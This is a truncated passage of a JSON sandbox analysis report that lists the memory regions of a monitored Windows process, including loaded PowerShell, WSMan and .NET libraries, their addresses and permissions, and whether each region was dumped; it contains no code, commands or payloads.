"end_va": 1830924287, "entry_point": 1830289408, "filename": "\\Windows\\winsxs\\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.6195_none_d09154e044272b9a\\msvcr80.dll", "id": "region_527", "name": "msvcr80.dll", "norm_filename": "c:\\windows\\winsxs\\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.6195_none_d09154e044272b9a\\msvcr80.dll", "region_type": "memory_mapped_file", "start_va": 1830289408, "timestamp": "00:00:24.762", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 27983872, "type": "region", "version": 1 }, "end_va": 27987967, "entry_point": 0, "filename": null, "id": "region_528", "name": "pagefile_0x0000000001ab0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 27983872, "timestamp": "00:00:25.095", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 28049408, "type": "region", "version": 1 }, "end_va": 28053503, "entry_point": 0, "filename": null, "id": "region_529", "name": "pagefile_0x0000000001ac0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 28049408, "timestamp": "00:00:25.095", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000002-region_00000530-addr_0x0000000001ad0000-size_0x0000000000010000-perm_.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "" ], "ref_process_dump": { "ref_id": "proc_dump_48", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 28114944, "type": "region", "version": 1 }, "end_va": 28180479, "entry_point": 0, "filename": null, "id": "region_530", "name": "private_0x0000000001ad0000", "norm_filename": null, "region_type": "private_memory", "start_va": 28114944, "timestamp": "00:00:25.095", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000002-region_00000531-addr_0x0000000001b20000-size_0x0000000000010000-perm_.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "" ], "ref_process_dump": { "ref_id": "proc_dump_49", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 28442624, "type": "region", "version": 1 }, "end_va": 28508159, "entry_point": 0, "filename": null, "id": "region_531", "name": "private_0x0000000001b20000", "norm_filename": null, "region_type": "private_memory", "start_va": 28442624, "timestamp": "00:00:25.095", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000002-region_00000532-addr_0x0000000001b30000-size_0x0000000000010000-perm_.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "" ], "ref_process_dump": { "ref_id": "proc_dump_50", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 28508160, "type": "region", "version": 1 }, "end_va": 28573695, "entry_point": 0, "filename": null, "id": "region_532", "name": "private_0x0000000001b30000", "norm_filename": null, "region_type": "private_memory", "start_va": 28508160, "timestamp": "00:00:25.096", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000002-region_00000533-addr_0x0000000001bf0000-size_0x0000000000010000-perm_.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "" ], "ref_process_dump": { "ref_id": "proc_dump_51", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 29294592, "type": "region", "version": 1 }, "end_va": 29360127, "entry_point": 0, "filename": null, "id": "region_533", "name": "private_0x0000000001bf0000", "norm_filename": null, "region_type": "private_memory", "start_va": 29294592, "timestamp": "00:00:25.096", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000002-region_00000534-addr_0x0000000001c00000-size_0x0000000000010000-perm_.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "" ], "ref_process_dump": { "ref_id": "proc_dump_52", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 29360128, "type": "region", "version": 1 }, "end_va": 29425663, "entry_point": 0, "filename": null, "id": "region_534", "name": "private_0x0000000001c00000", "norm_filename": null, "region_type": "private_memory", "start_va": 29360128, "timestamp": "00:00:25.096", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000002-region_00000535-addr_0x0000000001c10000-size_0x0000000000010000-perm_.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "" ], "ref_process_dump": { "ref_id": "proc_dump_53", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 29425664, "type": "region", "version": 1 }, "end_va": 29491199, "entry_point": 0, "filename": null, "id": "region_535", "name": "private_0x0000000001c10000", "norm_filename": null, "region_type": "private_memory", "start_va": 29425664, "timestamp": "00:00:25.097", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000002-region_00000536-addr_0x0000000001c60000-size_0x0000000000040000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_54", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 262144, "start_va": 29753344, "type": "region", "version": 1 }, "end_va": 30015487, "entry_point": 0, "filename": null, "id": "region_536", "name": "private_0x0000000001c60000", "norm_filename": null, "region_type": "private_memory", "start_va": 29753344, "timestamp": "00:00:25.097", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000002-region_00000537-addr_0x0000000001ca0000-size_0x00000000000a0000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_55", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 655360, "start_va": 30015488, "type": "region", "version": 1 }, "end_va": 30670847, "entry_point": 0, "filename": null, "id": "region_537", "name": "private_0x0000000001ca0000", "norm_filename": null, "region_type": "private_memory", "start_va": 30015488, "timestamp": "00:00:25.097", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000002-region_00000538-addr_0x0000000001f30000-size_0x0000000000040000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_56", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 262144, "start_va": 32702464, "type": "region", "version": 1 }, "end_va": 32964607, "entry_point": 0, "filename": null, "id": "region_538", "name": "private_0x0000000001f30000", "norm_filename": null, "region_type": "private_memory", "start_va": 32702464, "timestamp": "00:00:25.098", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000002-region_00000539-addr_0x0000000001f80000-size_0x0000000000010000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_57", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 33030144, "type": "region", "version": 1 }, "end_va": 33095679, "entry_point": 0, "filename": null, "id": "region_539", "name": "private_0x0000000001f80000", "norm_filename": null, "region_type": "private_memory", "start_va": 33030144, "timestamp": "00:00:25.098", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 33554432, "start_va": 33095680, "type": "region", "version": 1 }, "end_va": 66650111, "entry_point": 0, "filename": null, "id": "region_540", "name": "private_0x0000000001f90000", "norm_filename": null, "region_type": "private_memory", "start_va": 33095680, "timestamp": "00:00:25.098", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 11501568, "start_va": 1651834880, "type": "region", "version": 1 }, "end_va": 1663336447, "entry_point": 1651834880, "filename": "\\Windows\\assembly\\NativeImages_v2.0.50727_32\\mscorlib\\62a0b3e4b40ec0e8c5cfaa0c8848e64a\\mscorlib.ni.dll", "id": "region_541", "name": "mscorlib.ni.dll", "norm_filename": "c:\\windows\\assembly\\nativeimages_v2.0.50727_32\\mscorlib\\62a0b3e4b40ec0e8c5cfaa0c8848e64a\\mscorlib.ni.dll", "region_type": "memory_mapped_file", "start_va": 1651834880, "timestamp": "00:00:25.099", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000002-region_00000542-addr_0x000000007ffd9000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_58", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2147323904, "type": "region", "version": 1 }, "end_va": 2147327999, "entry_point": 0, "filename": null, "id": "region_542", "name": "private_0x000000007ffd9000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147323904, "timestamp": "00:00:25.108", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000002-region_00000543-addr_0x000000007ffda000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_59", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2147328000, "type": "region", "version": 1 }, "end_va": 2147332095, "entry_point": 0, "filename": null, "id": "region_543", "name": "private_0x000000007ffda000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147328000, "timestamp": "00:00:25.108", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000002-region_00000559-addr_0x0000000001d40000-size_0x0000000000010000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_65", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 30670848, "type": "region", "version": 1 }, "end_va": 30736383, "entry_point": 0, "filename": null, "id": "region_559", "name": "private_0x0000000001d40000", "norm_filename": null, "region_type": "private_memory", "start_va": 30670848, "timestamp": "00:00:26.487", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 3022848, "start_va": 66650112, "type": "region", "version": 1 }, "end_va": 69672959, "entry_point": 66650112, "filename": "\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", "id": "region_560", "name": "system.management.automation.dll", "norm_filename": "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll", "region_type": "memory_mapped_file", "start_va": 66650112, "timestamp": "00:00:26.487", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 7979008, "start_va": 1643839488, "type": "region", "version": 1 }, "end_va": 1651818495, "entry_point": 1643839488, "filename": "\\Windows\\assembly\\NativeImages_v2.0.50727_32\\System\\9e0a3b9b9f457233a335d7fba8f95419\\System.ni.dll", "id": "region_561", "name": "system.ni.dll", "norm_filename": "c:\\windows\\assembly\\nativeimages_v2.0.50727_32\\system\\9e0a3b9b9f457233a335d7fba8f95419\\system.ni.dll", "region_type": "memory_mapped_file", "start_va": 1643839488, "timestamp": "00:00:26.495", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 528384, "start_va": 1829699584, "type": "region", "version": 1 }, "end_va": 1830227967, "entry_point": 1829699584, "filename": "\\Windows\\assembly\\NativeImages_v2.0.50727_32\\Microsoft.PowerShel#\\4bdde288f147e3b3f2c090ecdf704e6d\\Microsoft.PowerShell.ConsoleHost.ni.dll", "id": "region_562", "name": "microsoft.powershell.consolehost.ni.dll", "norm_filename": "c:\\windows\\assembly\\nativeimages_v2.0.50727_32\\microsoft.powershel#\\4bdde288f147e3b3f2c090ecdf704e6d\\microsoft.powershell.consolehost.ni.dll", "region_type": "memory_mapped_file", "start_va": 1829699584, "timestamp": "00:00:26.503", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 8888320, "start_va": 1631846400, "type": "region", "version": 1 }, "end_va": 1640734719, "entry_point": 1631846400, "filename": "\\Windows\\assembly\\NativeImages_v2.0.50727_32\\System.Management.A#\\a8e3a41ecbcc4bb1598ed5719f965110\\System.Management.Automation.ni.dll", "id": "region_563", "name": "system.management.automation.ni.dll", "norm_filename": "c:\\windows\\assembly\\nativeimages_v2.0.50727_32\\system.management.a#\\a8e3a41ecbcc4bb1598ed5719f965110\\system.management.automation.ni.dll", "region_type": "memory_mapped_file", "start_va": 1631846400, "timestamp": "00:00:26.759", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 36864, "start_va": 1955856384, "type": "region", "version": 1 }, "end_va": 1955893247, "entry_point": 1955861024, "filename": "\\Windows\\System32\\version.dll", "id": "region_564", "name": "version.dll", "norm_filename": "c:\\windows\\system32\\version.dll", "region_type": "memory_mapped_file", "start_va": 1955856384, "timestamp": "00:00:26.789", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 3022848, "start_va": 1640759296, "type": "region", "version": 1 }, "end_va": 1643782143, "entry_point": 1643441182, "filename": "\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", "id": "region_565", "name": "system.management.automation.dll", "norm_filename": "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll", "region_type": "memory_mapped_file", "start_va": 1640759296, "timestamp": "00:00:26.791", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 12288, "start_va": 30736384, "type": "region", "version": 1 }, "end_va": 30748671, "entry_point": 30736384, "filename": "\\Windows\\System32\\l_intl.nls", "id": "region_567", "name": "l_intl.nls", "norm_filename": "c:\\windows\\system32\\l_intl.nls", "region_type": "memory_mapped_file", "start_va": 30736384, "timestamp": "00:00:26.813", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 786432, "start_va": 31391744, "type": "region", "version": 1 }, "end_va": 32178175, "entry_point": 31391744, "filename": "\\Windows\\System32\\en-US\\KernelBase.dll.mui", "id": "region_568", "name": "kernelbase.dll.mui", "norm_filename": "c:\\windows\\system32\\en-us\\kernelbase.dll.mui", "region_type": "memory_mapped_file", "start_va": 31391744, "timestamp": "00:00:26.813", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 20480, "start_va": 2000617472, "type": "region", "version": 1 }, "end_va": 2000637951, "entry_point": 2000622648, "filename": "\\Windows\\System32\\psapi.dll", "id": "region_569", "name": "psapi.dll", "norm_filename": "c:\\windows\\system32\\psapi.dll", "region_type": "memory_mapped_file", "start_va": 2000617472, "timestamp": "00:00:26.857", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000002-region_00000570-addr_0x0000000001d60000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_66", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 30801920, "type": "region", "version": 1 }, "end_va": 30806015, "entry_point": 0, "filename": null, "id": "region_570", "name": "private_0x0000000001d60000", "norm_filename": null, "region_type": "private_memory", "start_va": 30801920, "timestamp": "00:00:26.917", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 20480, "start_va": 30867456, "type": "region", "version": 1 }, "end_va": 30887935, "entry_point": 30867456, "filename": "\\Windows\\assembly\\GAC_32\\mscorlib\\2.0.0.0__b77a5c561934e089\\sorttbls.nlp", "id": "region_571", "name": "sorttbls.nlp", "norm_filename": "c:\\windows\\assembly\\gac_32\\mscorlib\\2.0.0.0__b77a5c561934e089\\sorttbls.nlp", "region_type": "memory_mapped_file", "start_va": 30867456, "timestamp": "00:00:26.995", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 266240, "start_va": 32178176, "type": "region", "version": 1 }, "end_va": 32444415, "entry_point": 32178176, "filename": "\\Windows\\assembly\\GAC_32\\mscorlib\\2.0.0.0__b77a5c561934e089\\sortkey.nlp", "id": "region_572", "name": "sortkey.nlp", "norm_filename": "c:\\windows\\assembly\\gac_32\\mscorlib\\2.0.0.0__b77a5c561934e089\\sortkey.nlp", "region_type": "memory_mapped_file", "start_va": 32178176, "timestamp": "00:00:26.996", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 32768, "start_va": 30932992, "type": "region", "version": 1 }, "end_va": 30965759, "entry_point": 30932992, "filename": "\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Runtime\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Runtime.dll", "id": "region_575", "name": "microsoft.wsman.runtime.dll", "norm_filename": "c:\\windows\\assembly\\gac_msil\\microsoft.wsman.runtime\\1.0.0.0__31bf3856ad364e35\\microsoft.wsman.runtime.dll", "region_type": "memory_mapped_file", "start_va": 30932992, "timestamp": "00:00:27.615", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 30998528, "type": "region", "version": 1 }, "end_va": 31002623, "entry_point": 0, "filename": null, "id": "region_576", "name": "pagefile_0x0000000001d90000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 30998528, "timestamp": "00:00:27.621", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 274432, "start_va": 69730304, "type": "region", "version": 1 }, "end_va": 70004735, "entry_point": 69730304, "filename": "\\Windows\\assembly\\GAC_32\\System.Transactions\\2.0.0.0__b77a5c561934e089\\System.Transactions.dll", "id": "region_577", "name": "system.transactions.dll", "norm_filename": "c:\\windows\\assembly\\gac_32\\system.transactions\\2.0.0.0__b77a5c561934e089\\system.transactions.dll", "region_type": "memory_mapped_file", "start_va": 69730304, "timestamp": "00:00:27.622", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 2314240, "start_va": 1629487104, "type": "region", "version": 1 }, "end_va": 1631801343, "entry_point": 1629487104, "filename": "\\Windows\\assembly\\NativeImages_v2.0.50727_32\\System.Core\\fbc05b5b05dc6366b02b8e2f77d080f1\\System.Core.ni.dll", "id": "region_578", "name": "system.core.ni.dll", "norm_filename": "c:\\windows\\assembly\\nativeimages_v2.0.50727_32\\system.core\\fbc05b5b05dc6366b02b8e2f77d080f1\\system.core.ni.dll", "region_type": "memory_mapped_file", "start_va": 1629487104, "timestamp": "00:00:27.629", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 638976, "start_va": 1671233536, "type": "region", "version": 1 }, "end_va": 1671872511, "entry_point": 1671233536, "filename": "\\Windows\\assembly\\NativeImages_v2.0.50727_32\\System.Transactions\\ad18f93fc713db2c4b29b25116c13bd8\\System.Transactions.ni.dll", "id": "region_579", "name": "system.transactions.ni.dll", "norm_filename": "c:\\windows\\assembly\\nativeimages_v2.0.50727_32\\system.transactions\\ad18f93fc713db2c4b29b25116c13bd8\\system.transactions.ni.dll", "region_type": "memory_mapped_file", "start_va": 1671233536, "timestamp": "00:00:27.636", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 544768, "start_va": 1671888896, "type": "region", "version": 1 }, "end_va": 1672433663, "entry_point": 1671888896, "filename": "\\Windows\\assembly\\NativeImages_v2.0.50727_32\\Microsoft.WSMan.Man#\\f1865caa683ceb3d12b383a94a35da14\\Microsoft.WSMan.Management.ni.dll", "id": "region_580", "name": "microsoft.wsman.management.ni.dll", "norm_filename": "c:\\windows\\assembly\\nativeimages_v2.0.50727_32\\microsoft.wsman.man#\\f1865caa683ceb3d12b383a94a35da14\\microsoft.wsman.management.ni.dll", "region_type": "memory_mapped_file", "start_va": 1671888896, "timestamp": "00:00:27.646", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 274432, "start_va": 1739194368, "type": "region", "version": 1 }, "end_va": 1739468799, "entry_point": 1739452476, "filename": "\\Windows\\assembly\\GAC_32\\System.Transactions\\2.0.0.0__b77a5c561934e089\\System.Transactions.dll", "id": "region_581", "name": "system.transactions.dll", "norm_filename": "c:\\windows\\assembly\\gac_32\\system.transactions\\2.0.0.0__b77a5c561934e089\\system.transactions.dll", "region_type": "memory_mapped_file", "start_va": 1739194368, "timestamp": "00:00:27.653", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 151552, "start_va": 1829502976, "type": "region", "version": 1 }, "end_va": 1829654527, "entry_point": 1829502976, "filename": "\\Windows\\assembly\\NativeImages_v2.0.50727_32\\System.Configuratio#\\f02737c83305687a68c088927a6c5a98\\System.Configuration.Install.ni.dll", "id": "region_582", "name": "system.configuration.install.ni.dll", "norm_filename": "c:\\windows\\assembly\\nativeimages_v2.0.50727_32\\system.configuratio#\\f02737c83305687a68c088927a6c5a98\\system.configuration.install.ni.dll", "region_type": "memory_mapped_file", "start_va": 1829502976, "timestamp": "00:00:27.654", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 307200, "start_va": 1833304064, "type": "region", "version": 1 }, "end_va": 1833611263, "entry_point": 1833304064, "filename": "\\Windows\\assembly\\NativeImages_v2.0.50727_32\\Microsoft.PowerShel#\\e112e4460a0c9122de8c382126da4a2f\\Microsoft.PowerShell.Commands.Diagnostics.ni.dll", "id": "region_583", "name": "microsoft.powershell.commands.diagnostics.ni.dll", "norm_filename": "c:\\windows\\assembly\\nativeimages_v2.0.50727_32\\microsoft.powershel#\\e112e4460a0c9122de8c382126da4a2f\\microsoft.powershell.commands.diagnostics.ni.dll", "region_type": "memory_mapped_file", "start_va": 1833304064, "timestamp": "00:00:27.662", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 31064064, "type": "region", "version": 1 }, "end_va": 31068159, "entry_point": 0, "filename": null, "id": "region_584", "name": "pagefile_0x0000000001da0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 31064064, "timestamp": "00:00:28.386", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 32768, "start_va": 1614020608, "type": "region", "version": 1 }, "end_va": 1614053375, "entry_point": 1614020608, "filename": "\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\Culture.dll", "id": "region_585", "name": "culture.dll", "norm_filename": "c:\\windows\\microsoft.net\\framework\\v2.0.50727\\culture.dll", "region_type": "memory_mapped_file", "start_va": 1614020608, "timestamp": "00:00:28.386", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 798720, "start_va": 1626931200, "type": "region", "version": 1 }, "end_va": 1627729919, "entry_point": 1626931200, "filename": "\\Windows\\assembly\\NativeImages_v2.0.50727_32\\Microsoft.PowerShel#\\583c7b9f52114c026088bdb9f19f64e8\\Microsoft.PowerShell.Commands.Management.ni.dll", "id": "region_586", "name": "microsoft.powershell.commands.management.ni.dll", "norm_filename": "c:\\windows\\assembly\\nativeimages_v2.0.50727_32\\microsoft.powershel#\\583c7b9f52114c026088bdb9f19f64e8\\microsoft.powershell.commands.management.ni.dll", "region_type": "memory_mapped_file", "start_va": 1626931200, "timestamp": "00:00:28.393", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1695744, "start_va": 1627783168, "type": "region", "version": 1 }, "end_va": 1629478911, "entry_point": 1627783168, "filename": "\\Windows\\assembly\\NativeImages_v2.0.50727_32\\Microsoft.PowerShel#\\82d7758f278f47dc4191abab1cb11ce3\\Microsoft.PowerShell.Commands.Utility.ni.dll", "id": "region_587", "name": "microsoft.powershell.commands.utility.ni.dll", "norm_filename": "c:\\windows\\assembly\\nativeimages_v2.0.50727_32\\microsoft.powershel#\\82d7758f278f47dc4191abab1cb11ce3\\microsoft.powershell.commands.utility.ni.dll", "region_type": "memory_mapped_file", "start_va": 1627783168, "timestamp": "00:00:28.401", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 184320, "start_va": 1829306368, "type": "region", "version": 1 }, "end_va": 1829490687, "entry_point": 1829306368, "filename": "\\Windows\\assembly\\NativeImages_v2.0.50727_32\\Microsoft.PowerShel#\\6c5bef3ab74c06a641444eff648c0dde\\Microsoft.PowerShell.Security.ni.dll", "id": "region_588", "name": "microsoft.powershell.security.ni.dll", "norm_filename": "c:\\windows\\assembly\\nativeimages_v2.0.50727_32\\microsoft.powershel#\\6c5bef3ab74c06a641444eff648c0dde\\microsoft.powershell.security.ni.dll", "region_type": "memory_mapped_file", "start_va": 1829306368, "timestamp": "00:00:28.407", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000002-region_00000589-addr_0x0000000001da0000-size_0x0000000000010000-perm_.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "" ], "ref_process_dump": { "ref_id": "proc_dump_67", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 31064064, "type": "region", "version": 1 }, "end_va": 31129599, "entry_point": 0, "filename": null, "id": "region_589", "name": "private_0x0000000001da0000", "norm_filename": null, "region_type": "private_memory", "start_va": 31064064, "timestamp": "00:00:28.922", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable" ], "ref_process_dump": null, "size": 344064, "start_va": 70057984, "type": "region", "version": 1 }, "end_va": 70402047, "entry_point": 70057984, "filename": "\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\mscorrc.dll", "id": "region_590", "name": "mscorrc.dll", "norm_filename": "c:\\windows\\microsoft.net\\framework\\v2.0.50727\\mscorrc.dll", "region_type": "memory_mapped_file", "start_va": 70057984, "timestamp": "00:00:28.922", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1130496, "start_va": 1619132416, "type": "region", "version": 1 }, "end_va": 1620262911, "entry_point": 1619132416, "filename": "\\Windows\\assembly\\NativeImages_v2.0.50727_32\\System.DirectorySer#\\45ec12795950a7d54691591c615a9e3c\\System.DirectoryServices.ni.dll", "id": "region_591", "name": "system.directoryservices.ni.dll", "norm_filename": "c:\\windows\\assembly\\nativeimages_v2.0.50727_32\\system.directoryser#\\45ec12795950a7d54691591c615a9e3c\\system.directoryservices.ni.dll", "region_type": "memory_mapped_file", "start_va": 1619132416, "timestamp": "00:00:28.926", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1064960, 